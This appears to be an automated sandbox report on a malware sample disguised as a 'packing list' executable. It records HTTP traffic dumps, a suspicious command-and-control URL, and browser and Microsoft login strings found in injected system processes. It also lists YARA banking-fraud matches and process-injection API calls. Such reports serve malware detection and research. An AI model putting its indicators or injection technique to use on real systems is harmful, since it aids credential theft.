                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:46:05 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:46:12 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 29 Aug 2024 18:03:22 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CIHTPr4BZNyhn28sOynfY4kBZe%2FbGeyLo%2FY8C0dJAltL1PiBqfioUeI3OVp2R2NHHV7gkTcZyc%2B2IV1uLKn0zKSzUEQLmFnF6plF8aqeVVYsoF5RMKixyPWqf5VcdR7UinBQNnRjbVLT"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e81bd7e8a9b18fa-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1656&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=778&delivery_rate=0&cwnd=126&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 64 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 df 6f d3 30 10 7e df 5f 71 64 02 81 b4 d4 4d bb 31 9a a4 91 46 bb 89 49 03 26 56 04 7b f4 92 6b 6c 48 ec 60 5f d3 86 89 ff 1d 39 c9 da 4e fc 7a c1 79 b1 ef be fb be 3b fb 2e f1 93 f9 fb d9 e2 f6 fa 1c 04 95 05 5c 7f 7c 7d 75 39 03 cf 67 ec d3 78 c6 d8 7c 31 87 cf 6f 16 6f af 20 18 0c e1 86 8c 4c 89 b1 f3 77 1e 78 82 a8 0a 19 5b af d7 83 f5 78 a0 4d ce 16 1f d8 c6 b1 04 2e ac df fa b6 8d 19 64 94 79 c9 41 dc 8a 6c ca 42 d9 e9 6f 08 82 c9 64 d2 c5 79 0e 14 16 5c e5 53 0f 95 07 db 5d 12 0b e4 59 72 00 00 10 93 a4 02 93 e3 e1 31 3c 2b 33 6e 45 04 ef 34 c1 85 5e a9 2c 66 9d b3 03 96 48 1c 9c 9e 8f df 56 b2 9e 7a 33 ad 08 15 f9 8b a6 42 0f d2 ee 34 f5 08 37 c4 9c 7e 04 a9 e0 c6 22 4d 3f 2e 2e fc 57 1e db 27 52 bc c4 a9 97 a1 4d 8d ac 48 6a b5 c7 70 a3 8d 69 8e a0 e2 39 82 d2 04 4b 97 cc 36 dc 52 53 20 50 53 61 af 95 5a eb 75 3e b7 ee 74 d6 c0 fd 52 2b f2 ad fc 8e 61 70 5c 6d 22 48 75 a1 4d 78 78 da ae 08 5a f7 92 97 b2 68 42 6e 24 2f 22 70 54 3e 2f 64 ae c2 14 15 a1 89 7e 6c 39 45 f0 88 f1 d5 70 8f 72 32 39 3b 3d bb 88 a0 e4 26 97 2a 84 d3 61 b5 81 a1 fb f6 09 46 70 df e1 e1 70 7e fe 72 76 32 7f 9c 03 f4 49 ec 44 60 d4 Data Ascii: 2d3To0~_qdM1FI&V{klH`_9Nzy;.\|}u9gx|1oo Lwx[xM.dyAlBody\S]Yr1<+3nE4^,fHVz3B47~"M?..W'RMHjpi9K6RS PSaZu>tR+ap\m"HuMxxZhBn$/"pT>/d~l9Epr29;=&*aFpp~rv2ID`
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:46:15 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 29 Aug 2024 18:03:22 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q3aFGSB6341Slcs0lot%2FomwuC3emXHy8a5GvLzXYSlEpFaW2zENlMDREXAWIXHUd4%2FfiA8MOXfTp%2FZ7K8udiu%2BRYsj44UhpUiwjGsbNSrf%2F4TB38r9PVzuD%2Be1RhwMiEQHu%2FU5NXf1w4"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e81bd8f2c410f74-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1626&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=798&delivery_rate=0&cwnd=134&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 63 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 df 6f d3 30 10 7e df 5f 71 64 02 81 b4 d4 4d bb 31 9a a4 91 46 bb 89 49 03 26 56 04 7b f4 92 6b 6c 48 ec 60 5f d3 86 89 ff 1d 39 c9 da 4e fc 7a c1 79 b1 ef be fb be 3b fb 2e f1 93 f9 fb d9 e2 f6 fa 1c 04 95 05 5c 7f 7c 7d 75 39 03 cf 67 ec d3 78 c6 d8 7c 31 87 cf 6f 16 6f af 20 18 0c e1 86 8c 4c 89 b1 f3 77 1e 78 82 a8 0a 19 5b af d7 83 f5 78 a0 4d ce 16 1f d8 c6 b1 04 2e ac df fa b6 8d 19 64 94 79 c9 41 dc 8a 6c ca 42 d9 e9 6f 08 82 c9 64 d2 c5 79 0e 14 16 5c e5 53 0f 95 07 db 5d 12 0b e4 59 72 00 00 10 93 a4 02 93 e3 e1 31 3c 2b 33 6e 45 04 ef 34 c1 85 5e a9 2c 66 9d b3 03 96 48 1c 9c 9e 8f df 56 b2 9e 7a 33 ad 08 15 f9 8b a6 42 0f d2 ee 34 f5 08 37 c4 9c 7e 04 a9 e0 c6 22 4d 3f 2e 2e fc 57 1e db 27 52 bc c4 a9 97 a1 4d 8d ac 48 6a b5 c7 70 a3 8d 69 8e a0 e2 39 82 d2 04 4b 97 cc 36 dc 52 53 20 50 53 61 af 95 5a eb 75 3e b7 ee 74 d6 c0 fd 52 2b f2 ad fc 8e 61 70 5c 6d 22 48 75 a1 4d 78 78 da ae 08 5a f7 92 97 b2 68 42 6e 24 2f 22 70 54 3e 2f 64 ae c2 14 15 a1 89 7e 6c 39 45 f0 88 f1 d5 70 8f 72 32 39 3b 3d bb 88 a0 e4 26 97 2a 84 d3 61 b5 81 a1 fb f6 09 46 70 df e1 e1 70 7e fe 72 76 32 7f Data Ascii: 2c8To0~_qdM1FI&V{klH`_9Nzy;.\|}u9gx|1oo Lwx[xM.dyAlBody\S]Yr1<+3nE4^,fHVz3B47~"M?..W'RMHjpi9K6RS PSaZu>tR+ap\m"HuMxxZhBn$/"pT>/d~l9Epr29;=&*aFpp~rv2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:46:18 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 29 Aug 2024 18:03:22 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mia4mT%2Fm5uM89UaeJK9wrs3fa4B6H3rhhGHT%2B1IvpsccoyoC9GUIvqyHWzJMwzsemfNIhD7JtsRBvjyAK2P4rSMd9W8sJwOZNclgtY%2FAszWtIcdl%2FwE2e2jrPHGV7WsYxo%2B%2BN7OSyOmb"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e81bda29a22432b-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1658&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1815&delivery_rate=0&cwnd=187&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 64 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 df 6f d3 30 10 7e df 5f 71 64 02 81 b4 d4 4d bb 31 9a a4 91 46 bb 89 49 03 26 56 04 7b f4 92 6b 6c 48 ec 60 5f d3 86 89 ff 1d 39 c9 da 4e fc 7a c1 79 b1 ef be fb be 3b fb 2e f1 93 f9 fb d9 e2 f6 fa 1c 04 95 05 5c 7f 7c 7d 75 39 03 cf 67 ec d3 78 c6 d8 7c 31 87 cf 6f 16 6f af 20 18 0c e1 86 8c 4c 89 b1 f3 77 1e 78 82 a8 0a 19 5b af d7 83 f5 78 a0 4d ce 16 1f d8 c6 b1 04 2e ac df fa b6 8d 19 64 94 79 c9 41 dc 8a 6c ca 42 d9 e9 6f 08 82 c9 64 d2 c5 79 0e 14 16 5c e5 53 0f 95 07 db 5d 12 0b e4 59 72 00 00 10 93 a4 02 93 e3 e1 31 3c 2b 33 6e 45 04 ef 34 c1 85 5e a9 2c 66 9d b3 03 96 48 1c 9c 9e 8f df 56 b2 9e 7a 33 ad 08 15 f9 8b a6 42 0f d2 ee 34 f5 08 37 c4 9c 7e 04 a9 e0 c6 22 4d 3f 2e 2e fc 57 1e db 27 52 bc c4 a9 97 a1 4d 8d ac 48 6a b5 c7 70 a3 8d 69 8e a0 e2 39 82 d2 04 4b 97 cc 36 dc 52 53 20 50 53 61 af 95 5a eb 75 3e b7 ee 74 d6 c0 fd 52 2b f2 ad fc 8e 61 70 5c 6d 22 48 75 a1 4d 78 78 da ae 08 5a f7 92 97 b2 68 42 6e 24 2f 22 70 54 3e 2f 64 ae c2 14 15 a1 89 7e 6c 39 45 f0 88 f1 d5 70 8f 72 32 39 3b 3d bb 88 a0 e4 26 97 2a 84 d3 61 b5 81 a1 fb f6 09 46 70 df e1 e1 70 7e fe 72 76 32 7f 9c Data Ascii: 2d3To0~_qdM1FI&V{klH`_9Nzy;.\|}u9gx|1oo Lwx[xM.dyAlBody\S]Yr1<+3nE4^,fHVz3B47~"M?..W'RMHjpi9K6RS PSaZu>tR+ap\m"HuMxxZhBn$/"pT>/d~l9Epr29;=&*aFpp~rv2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:46:20 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 29 Aug 2024 18:03:22 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1kNUT%2B2vqutbsRFez4tyuewsYGLcDrILirTekWPnHVI9kvON05mIuoEvIc3EyL13tveKJCKglqS94yHKWpM%2Faa4ipn2Vr%2BdfrSWf91cYTyuGWTvyNx5t7wa7weiUE63zIxuu9S76n2FQ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e81bdb36def4288-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1784&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=516&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 38 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 6f 72 72 79 2c 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a Data Ascii: 583<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/css"> body {font-size:
                Source: RUaXGIhjtGYK.exe, 00000007.00000002.3344117525.0000000005429000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.zripidro-priek.sbs
                Source: RUaXGIhjtGYK.exe, 00000007.00000002.3344117525.0000000005429000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.zripidro-priek.sbs/z4gi/
                Source: sort.exe, 00000005.00000003.2720283100.00000000074E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: sort.exe, 00000005.00000003.2720283100.00000000074E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: sort.exe, 00000005.00000003.2720283100.00000000074E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: sort.exe, 00000005.00000003.2720283100.00000000074E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: sort.exe, 00000005.00000003.2720283100.00000000074E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: sort.exe, 00000005.00000003.2720283100.00000000074E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: sort.exe, 00000005.00000003.2720283100.00000000074E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: sort.exe, 00000005.00000002.3341193924.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: sort.exe, 00000005.00000002.3341193924.00000000005B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: sort.exe, 00000005.00000002.3341193924.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: sort.exe, 00000005.00000002.3341193924.00000000005B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: sort.exe, 00000005.00000002.3341193924.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: sort.exe, 00000005.00000002.3341193924.00000000005B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: sort.exe, 00000005.00000003.2715527643.0000000007410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: sort.exe, 00000005.00000003.2720283100.00000000074E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: sort.exe, 00000005.00000003.2720283100.00000000074E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B86B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00B86B0C
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B86D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00B86D07
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B86B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00B86B0C
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B72B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00B72B37
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B9F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00B9F7FF

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3344117525.00000000053D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2529387256.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3342301156.0000000002910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3340903495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2531035516.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3342241743.00000000028C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2531101341.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3342260873.0000000005000000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: This is a third-party compiled AutoIt script.0_2_00B33D19
                Source: packing list G25469.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: packing list G25469.exe, 00000000.00000000.2080231271.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_9dd4ce02-1
                Source: packing list G25469.exe, 00000000.00000000.2080231271.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_d72bccdb-f
                Source: packing list G25469.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_bb26e1c3-d
                Source: packing list G25469.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_0a488fb7-a
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C553 NtClose,2_2_0042C553
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972B60 NtClose,LdrInitializeThunk,2_2_03972B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03972DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03972C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039735C0 NtCreateMutant,LdrInitializeThunk,2_2_039735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03974340 NtSetContextThread,2_2_03974340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03974650 NtSuspendThread,2_2_03974650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972B80 NtQueryInformationFile,2_2_03972B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972BA0 NtEnumerateValueKey,2_2_03972BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972BF0 NtAllocateVirtualMemory,2_2_03972BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972BE0 NtQueryValueKey,2_2_03972BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972AB0 NtWaitForSingleObject,2_2_03972AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972AD0 NtReadFile,2_2_03972AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972AF0 NtWriteFile,2_2_03972AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972F90 NtProtectVirtualMemory,2_2_03972F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972FB0 NtResumeThread,2_2_03972FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972FA0 NtQuerySection,2_2_03972FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972FE0 NtCreateFile,2_2_03972FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972F30 NtCreateSection,2_2_03972F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972F60 NtCreateProcessEx,2_2_03972F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972E80 NtReadVirtualMemory,2_2_03972E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972EA0 NtAdjustPrivilegesToken,2_2_03972EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972EE0 NtQueueApcThread,2_2_03972EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972E30 NtWriteVirtualMemory,2_2_03972E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972DB0 NtEnumerateKey,2_2_03972DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972DD0 NtDelayExecution,2_2_03972DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972D10 NtMapViewOfSection,2_2_03972D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972D00 NtSetInformationFile,2_2_03972D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972D30 NtUnmapViewOfSection,2_2_03972D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972CA0 NtQueryInformationToken,2_2_03972CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972CC0 NtQueryVirtualMemory,2_2_03972CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972CF0 NtOpenProcess,2_2_03972CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972C00 NtQueryInformationProcess,2_2_03972C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972C60 NtCreateKey,2_2_03972C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973090 NtSetValueKey,2_2_03973090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973010 NtOpenDirectoryObject,2_2_03973010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039739B0 NtGetContextThread,2_2_039739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973D10 NtOpenProcessToken,2_2_03973D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973D70 NtOpenThread,2_2_03973D70
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CA4340 NtSetContextThread,LdrInitializeThunk,5_2_02CA4340
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CA4650 NtSuspendThread,LdrInitializeThunk,5_2_02CA4650
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CA2AD0 NtReadFile,LdrInitializeThunk,5_2_02CA2AD0
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CA2AF0 NtWriteFile,LdrInitializeThunk,5_2_02CA2AF0
